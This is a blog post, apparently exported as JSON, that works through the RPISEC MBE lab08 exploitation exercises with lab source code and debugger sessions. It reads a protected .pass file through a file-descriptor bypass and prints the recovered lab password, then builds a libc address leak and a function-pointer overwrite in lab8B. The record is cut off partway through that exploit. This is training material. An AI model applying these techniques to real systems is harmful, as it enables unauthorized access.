{"id":425,"date":"2018-03-02T17:40:28","date_gmt":"2018-03-02T17:40:28","guid":{"rendered":"https:\/\/devel0pment.de\/?p=425"},"modified":"2018-05-20T19:54:37","modified_gmt":"2018-05-20T19:54:37","slug":"rpisec-mbe-writeup-lab08-misc-and-stack-cookies","status":"publish","type":"post","link":"https:\/\/devel0pment.de\/?p=425","title":{"rendered":"RPISEC\/MBE: writeup lab08 (Misc and Stack Cookies)"},"content":{"rendered":"

While the last lab<\/a> introduced the subject of Heap Exploitation<\/i>, this lab focuses on Misc and Stack Cookies<\/i>.<\/p>\n

The lab contains three levels again ranging from C to A:
\n–> lab8C<\/a>
\n–> lab8B<\/a>
\n–> lab8A<\/a><\/p>\n

<\/p>\n

\n

lab8C<\/h1>\n

The username for the first level of this lab is lab8C<\/span> with the password lab08start<\/span>:<\/p>\n

\r\nlogin as: lab8C\r\nlab8C@localhost's password: (lab08start)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------[ contact@rpis.ec ]-----------------\r\n<\/pre>\n
We start by inspecting the source code:<\/p>\n
\r\nlab8C@warzone:\/levels\/lab08$ cat lab8C.c\r\n\/*\r\n * gcc -z relro -z now -fPIE -pie -fstack-protector-all -o lab8C lab8C.c\r\n *\/\r\n\r\n#include<errno.h>\r\n#include<fcntl.h>\r\n#include<stdio.h>\r\n#include<stdlib.h>\r\n#include<string.h>\r\n#include<sys\/types.h>\r\n#include<unistd.h>\r\n\r\nstruct fileComp {\r\n        char fileContents1[255];\r\n        char fileContents2[255];\r\n        int cmp;\r\n};\r\n\r\nchar* readfd(int fd)\r\n{\r\n        \/\/ Find length of file\r\n        int size = lseek(fd, 0, SEEK_END);\r\n        if(size >= 255)\r\n        {\r\n                printf("Your file is too big.\\n");\r\n                exit(EXIT_FAILURE);\r\n        }\r\n        \/\/ Reset fd to beginning of file\r\n        lseek(fd, 0, SEEK_SET);\r\n        \/\/ Allocate space for the file and a null byte\r\n        char* fileContents = malloc((size+1) & 0xff);\r\n        if(!fileContents)\r\n        {\r\n                printf("Could not allocate space for file contents\\n");\r\n                exit(EXIT_FAILURE);\r\n        }\r\n        \/\/ Read the file contents into the buffer\r\n        int numRead = read(fd, fileContents, size & 0xff);\r\n        return fileContents;\r\n}\r\n\r\nint getfd(char* arg)\r\n{\r\n        if(arg[0] != '-' || arg[1] != 'f' || arg[3] != '=')\r\n        {\r\n                printf("Invalid formatting in argument \\"%s\\"\\n", arg);\r\n                return -1;\r\n        }\r\n\r\n        int fd;\r\n        if(arg[2] == 'n')\r\n        {\r\n                \/\/ O_NOFOLLOW means that it won't follow symlinks. Sorry.\r\n                fd = open(arg+4, O_NOFOLLOW | O_RDONLY);\r\n                if(fd == -1)\r\n                {\r\n                        printf("File could not be opened\\n");\r\n                        return -1;\r\n                }\r\n        }\r\n        else if(arg[2] == 'd')\r\n        {\r\n                errno = 0;\r\n                fd = atoi(arg+4);\r\n        }\r\n        else\r\n        {\r\n                printf("Invalid formatting in argument \\"%s\\"\\n", arg);\r\n                return -1;\r\n        }\r\n\r\n        return fd;\r\n}\r\n\r\nstruct fileComp* comparefds(int fd1, int fd2)\r\n{\r\n        struct fileComp* fc = malloc(sizeof(struct fileComp));\r\n        if(!fc)\r\n        {\r\n                printf("Could not allocate space for file contents\\n");\r\n                exit(EXIT_FAILURE);\r\n        }\r\n\r\n        strcpy(fc->fileContents1, readfd(fd1));\r\n        strcpy(fc->fileContents2, readfd(fd2));\r\n        fc->cmp = strcmp(fc->fileContents1, fc->fileContents2);\r\n        return fc;\r\n}\r\n\r\nchar* securityCheck(char* arg, char* s)\r\n{\r\n        if(strstr(arg, ".pass"))\r\n                return "<<<For security reasons, your filename has been blocked>>>";\r\n        return s;\r\n}\r\n\r\nint main(int argc, char** argv)\r\n{\r\n        if(argc != 3)\r\n        {\r\n                printf("Hi. This program will do a lexicographical comparison of the \\\r\ncontents of two files. It has the bonus functionality of being \\\r\nable to process either filenames or file descriptors.\\n");\r\n                printf("Usage: %s {-fn=<filename>|-fd=<file_descriptor>} {-fn=<filename>|-fd=<file_descriptor>}\\n", argv[0]);\r\n                return EXIT_FAILURE;\r\n        }\r\n\r\n        int fd1 = getfd(argv[1]);\r\n        int fd2 = getfd(argv[2]);\r\n        if(fd1 == -1 || fd2 == -1)\r\n        {\r\n                printf("Usage: %s {-fn=<filename>|-fd=<file_descriptor>} {-fn=<filename>|-fd=<file_descriptor>}\\n", argv[0]);\r\n                return EXIT_FAILURE;\r\n        }\r\n        if(fd1 == 0 || fd2 == 0)\r\n        {\r\n                printf("Invalid fd argument.\\n");\r\n                printf("(We're still fixing some bugs with using STDIN.)\\n");\r\n                printf("Usage: %s {-fn=<filename>|-fd=<file_descriptor>} {-fn=<filename>|-fd=<file_descriptor>}\\n", argv[0]);\r\n                return EXIT_FAILURE;\r\n        }\r\n\r\n        struct fileComp* fc = comparefds(fd1, fd2);\r\n\r\n        printf(\r\n                        "\\"%s\\" is lexicographically %s \\"%s\\"\\n",\r\n                        securityCheck(argv[1], fc->fileContents1),\r\n                        fc->cmp > 0 ? "after" : (fc->cmp < 0 ? "before" : "equivalent to"),\r\n                        securityCheck(argv[2], fc->fileContents2));\r\n\r\n        return EXIT_SUCCESS;\r\n}\r\n<\/pre>\n
What does the program do?
\n–> A struct called fileComp<\/code> is defined which contains two buffers and an integer (lines 13-17).
\n–> Within the main<\/code> function (line 97) two arguments to the program are expected.
\n–> Both arguments are supposed to identify a file by providing either a filename (-fn<\/code>) or a file descriptor (-fd<\/code>).
\n–> The function getfd<\/code> (line 42) is used to get the corresponding file descriptor from the provided options.
\n    – If a filename is provided (-fn<\/code>) the file is opened using the function open<\/code>.
\n    – If a file descriptor is provided (-fd<\/code>) the file descriptor is simply returned as an integer.
\n–> After both file descriptors are fetched and are valid the function comparefds<\/code> is called (line 123).
\n–> Within comparefds<\/code> (line 75) the struct fileComp<\/code> is instantiated and the contents of both files are copied into the struct object using strcpy<\/code> and the user defined function readfd<\/code>.
\n–> The function readfd<\/code> (line 19) allocates a buffer, reads the file-contents and returns the buffer containing the file-contents.
\n–> At last within the main<\/code> function printf<\/code> is used to display the comparison result. The contents of the file are filtered by the function securityCheck<\/code>.
\n–> This function (line 90) checks if the provided option contains the string \".pass\"<\/code>. If the string is not found, the actual contents of the file are returned, otherwise a message stating that the filename has been blocked.<\/p>\n
Where is the vulnerability within the program?
\nAs usual our goal is to read the .pass<\/code> file in the home-directory from the user of the next level (in this case \/home\/lab8B\/.pass<\/code>). The program enables us to provide two files which contents are compared and also displayed:<\/p>\n
\r\nlab8C@warzone:\/levels\/lab08$ echo -n "test1" > \/tmp\/test1\r\nlab8C@warzone:\/levels\/lab08$ echo -n "test2" > \/tmp\/test2\r\nlab8C@warzone:\/levels\/lab08$ .\/lab8C -fn=\/tmp\/test1 -fn=\/tmp\/test2\r\n"test1" is lexicographically before "test2"\r\n<\/pre>\n
But we cannot simply read the .pass<\/code> file because the function securityCheck<\/code> tests if the filename contains the string .pass<\/code> and filters the output:<\/p>\n
\r\nlab8C@warzone:\/levels\/lab08$ .\/lab8C -fn=\/tmp\/test1 -fn=\/home\/lab8B\/.pass\r\n"test1" is lexicographically after "<<<For security reasons, your filename has been blocked>>>"\r\n<\/pre>\n
Though the program enables us not only to provide a filename but also a file descriptor, which is simply an integer. The first three file descriptors are fixed:
\n–> 0 = stdin<\/code>
\n–> 1 = stdout<\/code>
\n–> 2 = stderr<\/code><\/p>\n
When a new file is opened (for example by using open<\/code>), the next available file descriptor is used: 3<\/code>, 4<\/code>, 5<\/code>, …<\/p>\n
This means that when we provide \/home\/lab8B\/.pass<\/code> as the first file and the file descriptor 3<\/code> as the second file, these are both the same file. The difference is that the file-contents of the second file will not be filtered because our option does not containg the string .pass<\/code>:<\/p>\n
\r\nlab8C@warzone:\/levels\/lab08$ .\/lab8C -fn=\/home\/lab8B\/.pass -fd=3\r\n"<<<For security reasons, your filename has been blocked>>>" is lexicographically equivalent to "3v3ryth1ng_Is_@_F1l3\r\n"\r\n<\/pre>\n
Done \ud83d\ude42 The password for the next level is 3v3ryth1ng_Is_@_F1l3<\/code>.<\/p>\n
\n
lab8B<\/h1>\n
We can connect to the level using the previously achieved credentials lab8B<\/span> with the password 3v3ryth1ng_Is_@_F1l3<\/span>:<\/p>\n
\r\nlogin as: lab8B\r\nlab8B@localhost's password: (3v3ryth1ng_Is_@_F1l3)\r\n        ____________________.___  _____________________________\r\n        \\______   \\______   \\   |\/   _____\/\\_   _____\/\\_   ___ \\\r\n         |       _\/|     ___\/   |\\_____  \\  |    __)_ \/    \\  \\\/\r\n         |    |   \\|    |   |   |\/        \\ |        \\\\     \\____\r\n         |____|_  \/|____|   |___\/_______  \/\/_______  \/ \\______  \/\r\n                \\\/                      \\\/         \\\/         \\\/\r\n __      __  _____ ____________________________    _______  ___________\r\n\/  \\    \/  \\\/  _  \\\\______   \\____    \/\\_____  \\   \\      \\ \\_   _____\/\r\n\\   \\\/\\\/   \/  \/_\\  \\|       _\/ \/     \/  \/   |   \\  \/   |   \\ |    __)_\r\n \\        \/    |    \\    |   \\\/     \/_ \/    |    \\\/    |    \\|        \\\r\n  \\__\/\\  \/\\____|__  \/____|_  \/_______ \\\\_______  \/\\____|__  \/_______  \/\r\n       \\\/         \\\/       \\\/        \\\/        \\\/         \\\/        \\\/\r\n\r\n        --------------------------------------------------------\r\n\r\n                       Challenges are in \/levels\r\n                   Passwords are in \/home\/lab*\/.pass\r\n            You can create files or work directories in \/tmp\r\n\r\n         -----------------[ contact@rpis.ec ]-----------------\r\n<\/pre>\n
As usual we start by viewing the source code:<\/p>\n
\r\nlab8B@warzone:\/levels\/lab08$ cat lab8B.c\r\n\/*\r\n * gcc -z relro -z now -fPIE -pie -fstack-protector-all -o lab8B lab8B.c\r\n *\/\r\n\r\n#include<stdio.h>\r\n#include<stdlib.h>\r\n#include<string.h>\r\n\r\n#define MAX_FAVES 10\r\n\r\nstruct vector {\r\n        void (*printFunc)(struct vector*);\r\n        char a;\r\n        short b;\r\n        unsigned short c;\r\n        int d;\r\n        unsigned int e;\r\n        long f;\r\n        unsigned long g;\r\n        long long h;\r\n        unsigned long long i;\r\n};\r\n\r\nstruct vector v1;\r\nstruct vector v2;\r\nstruct vector v3;\r\nstruct vector* faves[MAX_FAVES];\r\n\r\nvoid printVector(struct vector* v);\r\n\r\nvoid printMenu()\r\n{\r\n        printf("+------------------------------------------------------------+\\n");\r\n        printf("|                                                            |\\n");\r\n        printf("|  1. Enter data                                          :> |\\n");\r\n        printf("|  2. Sum vectors                                         :] |\\n");\r\n        printf("|  3. Print vector                                        :3 |\\n");\r\n        printf("|  4. Save sum to favorites                               8) |\\n");\r\n        printf("|  5. Print favorites                                     :O |\\n");\r\n        printf("|  6. Load favorite                                       :$ |\\n");\r\n        printf("|  9. Get help                                            :D |\\n");\r\n        printf("|                                                            |\\n");\r\n        printf("+------------------------------------------------------------+\\n");\r\n        printf("I COMMAND YOU TO ENTER YOUR COMMAND: ");\r\n}\r\n\r\nstruct vector* vectorSel()\r\n{\r\n        printf("Which vector? ");\r\n        char sel;\r\n        while((sel = getchar()) == '\\n'); \/\/ I love C.\r\n        switch(sel)\r\n        {\r\n                case '1':\r\n                        return &v1;\r\n                case '2':\r\n                        return &v2;\r\n                case '3':\r\n                        return &v3;\r\n                default:\r\n                        printf("\\nBAD VECTOR SELECTION\\n");\r\n                        exit(EXIT_FAILURE);\r\n        }\r\n}\r\n\r\nvoid enterData()\r\n{\r\n        struct vector* v = vectorSel();\r\n        if(v == &v3)\r\n        {\r\n                printf("Please don't try to manually enter data into the sum.\\n");\r\n                return;\r\n        }\r\n        printf("Data entry time!\\n");\r\n        printf("char a: ");\r\n        while((v->a = getchar()) == '\\n'); \/\/ Still love C.\r\n        printf("short b: ");\r\n        scanf("%hd", &(v->b));\r\n        printf("unsigned short c: ");\r\n        scanf("%hu", &(v->c));\r\n        printf("int d: ");\r\n        scanf("%d", &(v->d));\r\n        printf("unsigned int e: ");\r\n        scanf("%u", &(v->e));\r\n        printf("long f: ");\r\n        scanf("%ld", &(v->f));\r\n        printf("unsigned long g: ");\r\n        scanf("%lu", &(v->g));\r\n        printf("long long h: ");\r\n        scanf("%lld", &(v->h));\r\n        printf("unsigned long long i: ");\r\n        scanf("%llu", &(v->i));\r\n        v->printFunc = printVector;\r\n}\r\n\r\nvoid sumVectors()\r\n{\r\n        if(v1.a==0 || v2.a==0 ||\r\n                        v1.b==0 || v2.b==0 ||\r\n                        v1.c==0 || v2.c==0 ||\r\n                        v1.d==0 || v2.d==0 ||\r\n                        v1.e==0 || v2.e==0 ||\r\n                        v1.f==0 || v2.f==0 ||\r\n                        v1.g==0 || v2.g==0 ||\r\n                        v1.h==0 || v2.h==0 ||\r\n                        v1.i==0 || v2.i==0)\r\n        {\r\n                printf("You didn't even set the addends... :(\\n");\r\n                return;\r\n        }\r\n        v3.a = v1.a + v2.a;\r\n        v3.b = v1.b + v2.b;\r\n        v3.c = v1.c + v2.c;\r\n        v3.d = v1.d + v2.d;\r\n        v3.e = v1.e + v2.e;\r\n        v3.f = v1.f + v2.f;\r\n        v3.g = v1.g + v2.g;\r\n        v3.h = v1.h + v2.h;\r\n        v3.i = v1.i + v2.i;\r\n        printf("Summed.\\n");\r\n}\r\n\r\n\/*\r\n * Bonus points if you don't use this function.\r\n *\/\r\nvoid thisIsASecret()\r\n{\r\n        system("\/bin\/sh");\r\n}\r\n\r\nvoid printVector(struct vector* v)\r\n{\r\n        printf("Address: %p\\n", v);\r\n        printf("void printFunc: %p\\n", v->printFunc);\r\n        printf("char a: %c\\n", v->a);\r\n        printf("short b: %hd\\n", v->b);\r\n        printf("unsigned short c: %hu\\n", v->c);\r\n        printf("int d: %d\\n", v->d);\r\n        printf("unsigned int e: %u\\n", v->e);\r\n        printf("long f: %ld\\n", v->f);\r\n        printf("unsigned long g: %lu\\n", v->g);\r\n        printf("long long h: %lld\\n", v->h);\r\n        printf("unsigned long long i: %llu\\n", v->i);\r\n}\r\n\r\nvoid fave()\r\n{\r\n        unsigned int i;\r\n        for(i=0; i<MAX_FAVES; i++)\r\n                if(!faves[i])\r\n                        break;\r\n        if(i == MAX_FAVES)\r\n                printf("You have too many favorites.\\n");\r\n        else\r\n        {\r\n                faves[i] = malloc(sizeof(struct vector));\r\n                memcpy(faves[i], (int*)(&v3)+i, sizeof(struct vector));\r\n                printf("I see you added that vector to your favorites, \\\r\nbut was it really your favorite?\\n");\r\n        }\r\n}\r\n\r\nvoid printFaves()\r\n{\r\n        unsigned int i;\r\n        for(i=0; i<MAX_FAVES; i++)\r\n                if(faves[i])\r\n                        printVector(faves[i]);\r\n                else\r\n                        break;\r\n        printf("Printed %u vectors.\\n", i);\r\n}\r\n\r\nvoid loadFave()\r\n{\r\n        printf("Which favorite? ");\r\n        unsigned int i;\r\n        scanf("%u", &i);\r\n        if(i >= MAX_FAVES)\r\n        {\r\n                printf("Index out of bounds\\n");\r\n                return;\r\n        }\r\n\r\n        struct vector* v = vectorSel();\r\n        if(v == &v3)\r\n        {\r\n                printf("Please don't try to manually enter data into the sum.\\n");\r\n                return;\r\n        }\r\n        memcpy(v, faves[i], sizeof(v));\r\n}\r\n\r\nvoid help()\r\n{\r\n        printf("\\\r\nThis program adds two vectors together and stores it in a third vector. You \\\r\ncan then add the sum to your list of favorites, or load a favorite back into \\\r\none of the addends.\\n");\r\n}\r\n\r\nint main(int argc, char** argv)\r\n{\r\n        char sel;\r\n        printMenu();\r\n        v1.printFunc = printf;\r\n        v2.printFunc = printf;\r\n        v3.printFunc = printf;\r\n        struct vector* v;\r\n        while((sel = getchar()) && (sel == '\\n' || getchar())) \/\/ Magic ;^)\r\n        {\r\n                if(sel == '\\n')\r\n                        continue;\r\n\r\n                switch(sel)\r\n                {\r\n                        case '0':\r\n                                printf("OK, bye.\\n");\r\n                                return EXIT_SUCCESS;\r\n                        case '1':\r\n                                enterData();\r\n                                break;\r\n                        case '2':\r\n                                sumVectors();\r\n                                break;\r\n                        case '3':\r\n                                v = vectorSel();\r\n                                \/\/printf("Calling %p\\n", v->printFunc);\r\n                                v->printFunc(v);\r\n                                break;\r\n                        case '4':\r\n                                fave();\r\n                                break;\r\n                        case '5':\r\n                                printFaves();\r\n                                break;\r\n                        case '6':\r\n                                loadFave();\r\n                                break;\r\n                        case '9':\r\n                                help();\r\n                                break;\r\n                        default:\r\n                                printf("\\nThat was bad input. \\\r\nJust like your futile attempt to pwn this.\\n");\r\n                                return EXIT_FAILURE;\r\n                }\r\n                printMenu();\r\n        }\r\n        return EXIT_SUCCESS;\r\n}\r\n<\/pre>\n
What does the program do?
\n–> A struct called vector<\/code> is defined on lines 11-22 containing a member-function printFunc<\/code> and 9 member variables (a<\/code> – i<\/code>) with varying types.
\n–> Following this three global struct vector<\/code> are defined (lines 24-26) as well as an array named faves<\/code> holding pointers to struct vector<\/code> instances (line 27).
\n–> Within the main<\/code> function (line 202) a menu is displayed using the function printMenu<\/code> (line 31) giving the user the following options:
\n    – Enter data \/ Sum vectors \/ Print vector
\n    – Save sum to favorites \/ Print favorites \/ Load favorite
\n    – Get help
\n–> After the menu is displayed within the main<\/code> function, the member-function of all three global vectors is set to printf<\/code> (lines 206-208).
\n–> When 1. Enter data<\/code> is selected, the function enterData<\/code> (line 66) calls vectorSel<\/code> (line 47) to let the user select one of the three globally defined vectors.
\n–> After this the user can input a value for every member variable of the vector (scanf<\/code>) and the member-function printFunc<\/code> is set to printVector<\/code> (line 131).
\n–> When 2. Sum vectors<\/code> is selected, the function sumVectors<\/code> (line 96) is called adding each member variable of v1<\/code> and v2<\/code> and storing the result in v3<\/code>.
\n–> When choosing 3. Print vector<\/code> the user can select on of three vectors on which the member-function printFunc<\/code> is called (line 229).
\n–> 4. Save sum to favorites<\/code> calls fave<\/code> (line 146), which searches the next free entry within the global array faves<\/code>, allocates memory for a new struct vector<\/code> instance and uses memcpy<\/code> to fill the newly allocated memory.
\n–> 5. Print favorites<\/code> calls printFaves<\/code> (line 163) iterating over the faves<\/code> array calling printVector<\/code> on all allocated pointers.
\n–> When 6. Load favorite<\/code> is selected, loadFave<\/code> (line 174) is called which allows the user to store a favorite vector from the array faves<\/code> to v1<\/code> or v2<\/code>.<\/p>\n
Where is the vulnerability within the program?<\/p>\n
When reading the source code the following line within the function fave<\/code> attracted my attention:<\/p>\n
\r\n...\r\n                faves[i] = malloc(sizeof(struct vector));\r\n                memcpy(faves[i], (int*)(&v3)+i, sizeof(struct vector));\r\n...\r\n<\/pre>\n
According to the menu selection the function should save the sum (this is v3<\/code>) to our favorites. The call to malloc<\/code> allocates memory for the new struct instance. The address of this memory is stored within the pointer-array faves<\/code> at the index i<\/code>.<\/p>\n
Then the contents of v3<\/code> should have been copied to the newly allocated memory. But the second argument (the source<\/code>) of the call to memcpy<\/code> is (int*)(&v3)+i<\/code>!? This means that when i<\/code> is greater than zero the copy-operation does not begin at the address of v3<\/code> but i * 4<\/code> bytes after the beginning of v3<\/code>. Let’s run the program using gdb<\/code> and see what impact this has:<\/p>\n
\r\nlab8B@warzone:\/levels\/lab08$ gdb .\/lab8B\r\nReading symbols from .\/lab8B...(no debugging symbols found)...done.\r\ngdb-peda$ r\r\nStarting program: \/levels\/lab08\/lab8B\r\n+------------------------------------------------------------+\r\n|                                                            |\r\n|  1. Enter data                                          :> |\r\n|  2. Sum vectors                                         :] |\r\n|  3. Print vector                                        :3 |\r\n|  4. Save sum to favorites                               8) |\r\n|  5. Print favorites                                     :O |\r\n|  6. Load favorite                                       :$ |\r\n|  9. Get help                                            :  |\r\n|                                                            |\r\n+------------------------------------------------------------+\r\nI COMMAND YOU TO ENTER YOUR COMMAND:\r\n<\/pre>\n
At first let’s enter some data for v1<\/code> and v2<\/code> and save the sum in v3<\/code>:<\/p>\n
\r\n...\r\nI COMMAND YOU TO ENTER YOUR COMMAND: 1\r\nWhich vector? 1\r\nData entry time!\r\nchar a: X\r\nshort b: 2222\r\nunsigned short c: 3333333\r\nint d: 4444444\r\nunsigned int e: 555555\r\nlong f: 6666666\r\nunsigned long g: 777777\r\nlong long h: 888888\r\nunsigned long long i: 9999999\r\n+------------------------------------------------------------+\r\n|                                                            |\r\n|  1. Enter data                                          :> |\r\n|  2. Sum vectors                                         :] |\r\n|  3. Print vector                                        :3 |\r\n|  4. Save sum to favorites                               8) |\r\n|  5. Print favorites                                     :O |\r\n|  6. Load favorite                                       :$ |\r\n|  9. Get help                                            :  |\r\n|                                                            |\r\n+------------------------------------------------------------+\r\nI COMMAND YOU TO ENTER YOUR COMMAND: 1\r\nWhich vector? 2\r\nData entry time!\r\nchar a: Y\r\nshort b: 1\r\nunsigned short c: 1\r\nint d: 1\r\nunsigned int e: 1\r\nlong f: 1\r\nunsigned long g: 1\r\nlong long h: 1\r\nunsigned long long i: 1\r\n+------------------------------------------------------------+\r\n|                                                            |\r\n|  1. Enter data                                          :> |\r\n|  2. Sum vectors                                         :] |\r\n|  3. Print vector                                        :3 |\r\n|  4. Save sum to favorites                               8) |\r\n|  5. Print favorites                                     :O |\r\n|  6. Load favorite                                       :$ |\r\n|  9. Get help                                            :  |\r\n|                                                            |\r\n+------------------------------------------------------------+\r\nI COMMAND YOU TO ENTER YOUR COMMAND: 2\r\nSummed.\r\n<\/pre>\n
If we now print the v3<\/code> we should see the result:<\/p>\n
\r\n+------------------------------------------------------------+\r\n|                                                            |\r\n|  1. Enter data                                          :> |\r\n|  2. Sum vectors                                         :] |\r\n|  3. Print vector                                        :3 |\r\n|  4. Save sum to favorites                               8) |\r\n|  5. Print favorites                                     :O |\r\n|  6. Load favorite                                       :$ |\r\n|  9. Get help                                            :  |\r\n|                                                            |\r\n+------------------------------------------------------------+\r\nI COMMAND YOU TO ENTER YOUR COMMAND: 3\r\nWhich vector? 3\r\n\u2592\u2592b\u2592\u2592+------------------------------------------------------------+\r\n|                                                            |\r\n|  1. Enter data                                          :> |\r\n|  2. Sum vectors                                         :] |\r\n|  3. Print vector                                        :3 |\r\n|  4. Save sum to favorites                               8) |\r\n|  5. Print favorites                                     :O |\r\n|  6. Load favorite                                       :$ |\r\n|  9. Get help                                            :  |\r\n|                                                            |\r\n+------------------------------------------------------------+\r\nI COMMAND YOU TO ENTER YOUR COMMAND:\r\n<\/pre>\n
Mh!? That is not the function printVector<\/code> being called. But, wait! Do you remember this lines within the main<\/code> function:<\/p>\n
\r\n        v1.printFunc = printf;\r\n        v2.printFunc = printf;\r\n        v3.printFunc = printf;\r\n<\/pre>\n
The member-function printFunc<\/code> has been initialized with printf<\/code>. And how is this function being called?<\/p>\n
\r\n                                v = vectorSel();\r\n                                \/\/printf("Calling %p\\n", v->printFunc);\r\n                                v->printFunc(v);\r\n<\/pre>\n
With v->printFunc(v)<\/code>! As printFunc<\/code> was set to printf<\/code> this equals printf(v)<\/code>. Because printf<\/code> expects the argument to be a format string, it will simply print the bytes at this address until a null-byte is reached. And what bytes are stored at the address of v<\/code>?<\/p>\n
\r\nstruct vector {\r\n        void (*printFunc)(struct vector*);\r\n\t\t...\r\n<\/pre>\n
The member-function printFunc<\/code>, which vice versa is set to printf<\/code>. So what does printf<\/code> print? The address of printf<\/code>! This means we can leak a libc-address and bypass ASLR.<\/p>\n
So far so good. Let’s proceed analysing the program’s behaviour.<\/p>\n
As for now we have entered some values for v1<\/code> and v2<\/code> and stored the sum of both vectors in v3<\/code>.<\/p>\n
As we already figured out, the source address in the function call to memcpy<\/code> within fave<\/code> seems to be messed up. So let’s save same favorites:<\/p>\n
\r\n+------------------------------------------------------------+\r\n|                                                            |\r\n|  1. Enter data                                          :> |\r\n|  2. Sum vectors                                         :] |\r\n|  3. Print vector                                        :3 |\r\n|  4. Save sum to favorites                               8) |\r\n|  5. Print favorites                                     :O |\r\n|  6. Load favorite                                       :$ |\r\n|  9. Get help                                            :  |\r\n|                                                            |\r\n+------------------------------------------------------------+\r\nI COMMAND YOU TO ENTER YOUR COMMAND: 4\r\nI see you added that vector to your favorites, but was it really your favorite?\r\n+------------------------------------------------------------+\r\n|                                                            |\r\n|  1. Enter data                                          :> |\r\n|  2. Sum vectors                                         :] |\r\n|  3. Print vector                                        :3 |\r\n|  4. Save sum to favorites                               8) |\r\n|  5. Print favorites                                     :O |\r\n|  6. Load favorite                                       :$ |\r\n|  9. Get help                                            :  |\r\n|                                                            |\r\n+------------------------------------------------------------+\r\nI COMMAND YOU TO ENTER YOUR COMMAND: 5\r\nAddress: 0xb8037008\r\nvoid printFunc: 0xb7628280\r\nchar a: \u2592\r\nshort b: 2223\r\nunsigned short c: 56534\r\nint d: 4444445\r\nunsigned int e: 555556\r\nlong f: 6666667\r\nunsigned long g: 777778\r\nlong long h: 888889\r\nunsigned long long i: 10000000\r\nPrinted 1 vectors.\r\n<\/pre>\n
The first copied favorite vector seems to be valid. The member variables contain the sum of v1<\/code> and v2<\/code>. Since the index i<\/code> is used in the memcpy<\/code> call let’s add another favorite:<\/p>\n
\r\n+------------------------------------------------------------+\r\n|                                                            |\r\n|  1. Enter data                                          :> |\r\n|  2. Sum vectors                                         :] |\r\n|  3. Print vector                                        :3 |\r\n|  4. Save sum to favorites                               8) |\r\n|  5. Print favorites                                     :O |\r\n|  6. Load favorite                                       :$ |\r\n|  9. Get help                                            :  |\r\n|                                                            |\r\n+------------------------------------------------------------+\r\nI COMMAND YOU TO ENTER YOUR COMMAND: 4\r\nI see you added that vector to your favorites, but was it really your favorite?\r\n+------------------------------------------------------------+\r\n|                                                            |\r\n|  1. Enter data                                          :> |\r\n|  2. Sum vectors                                         :] |\r\n|  3. Print vector                                        :3 |\r\n|  4. Save sum to favorites                               8) |\r\n|  5. Print favorites                                     :O |\r\n|  6. Load favorite                                       :$ |\r\n|  9. Get help                                            :  |\r\n|                                                            |\r\n+------------------------------------------------------------+\r\nI COMMAND YOU TO ENTER YOUR COMMAND: 5\r\nAddress: 0xb8037008\r\nvoid printFunc: 0xb7628280\r\nchar a: \u2592\r\nshort b: 2223\r\nunsigned short c: 56534\r\nint d: 4444445\r\nunsigned int e: 555556\r\nlong f: 6666667\r\nunsigned long g: 777778\r\nlong long h: 888889\r\nunsigned long long i: 10000000\r\nAddress: 0xb8037038\r\nvoid printFunc: 0x8af00b1\r\nchar a: \u2592\r\nshort b: 0\r\nunsigned short c: 53533\r\nint d: 555556\r\nunsigned int e: 6666667\r\nlong f: 777778\r\nunsigned long g: 888889\r\nlong long h: 42949672960000000\r\nunsigned long long i: 0\r\nPrinted 2 vectors.\r\n<\/pre>\n
The second favorite vector is messed up. As suggested the source address of the call to memcpy<\/code> has been incremented by 4 for the favorite vector with the index i = 1<\/code>, because the address is cast to an integer pointer:<\/p>\n
\r\n...\r\n                faves[i] = malloc(sizeof(struct vector));\r\n                memcpy(faves[i], (int*)(&v3)+i, sizeof(struct vector));\r\n...\r\n<\/pre>\n
In order to exploit this, the most interesting line of output is this one:<\/p>\n
\r\n...\r\nvoid printFunc: 0x8af00b1\r\n...\r\n<\/pre>\n
The variables which we stored in v1<\/code> and v2<\/code> were summed up in v3<\/code> and have been written to the function-pointer printFunc<\/code>:<\/p>\n
\r\n       v1                 v2               v3\r\na:  'X' (0x58)    +    'Y' (0x59)    =    0xb1\r\nb:    2222        +       1          =    2223 (0x8af)\r\n\r\n--> printFunc: 0x8af00b1\r\n<\/pre>\n
As you can see, between the char<\/code>-variable a<\/code> and the short<\/code>-variable b<\/code> there is an additional null-byte. This is caused by the compiler padding variables in the struct. In order to set printFunc<\/code> do an arbitrary value we have to add more favorites until a full 4-byte value we can control is stored in printFunc<\/code>. The easiest way is to use the unsigned integer e<\/code>. Thus we have to add a total amount of 5 favorites:<\/p>\n
\r\n...\r\nI COMMAND YOU TO ENTER YOUR COMMAND: 4\r\nI see you added that vector to your favorites, but was it really your favorite?\r\n+------------------------------------------------------------+\r\n|                                                            |\r\n|  1. Enter data                                          :> |\r\n|  2. Sum vectors                                         :] |\r\n|  3. Print vector                                        :3 |\r\n|  4. Save sum to favorites                               8) |\r\n|  5. Print favorites                                     :O |\r\n|  6. Load favorite                                       :$ |\r\n|  9. Get help                                            :  |\r\n|                                                            |\r\n+------------------------------------------------------------+\r\nI COMMAND YOU TO ENTER YOUR COMMAND: 5\r\n...\r\nAddress: 0xb80370c8\r\nvoid printFunc: 0x87a24\r\nchar a: \u2592\r\nshort b: 101\r\nunsigned short c: 56882\r\nint d: 888889\r\nunsigned int e: 0\r\nlong f: 10000000\r\nunsigned long g: 0\r\nlong long h: 0\r\nunsigned long long i: 0\r\nPrinted 5 vectors.\r\n<\/pre>\n
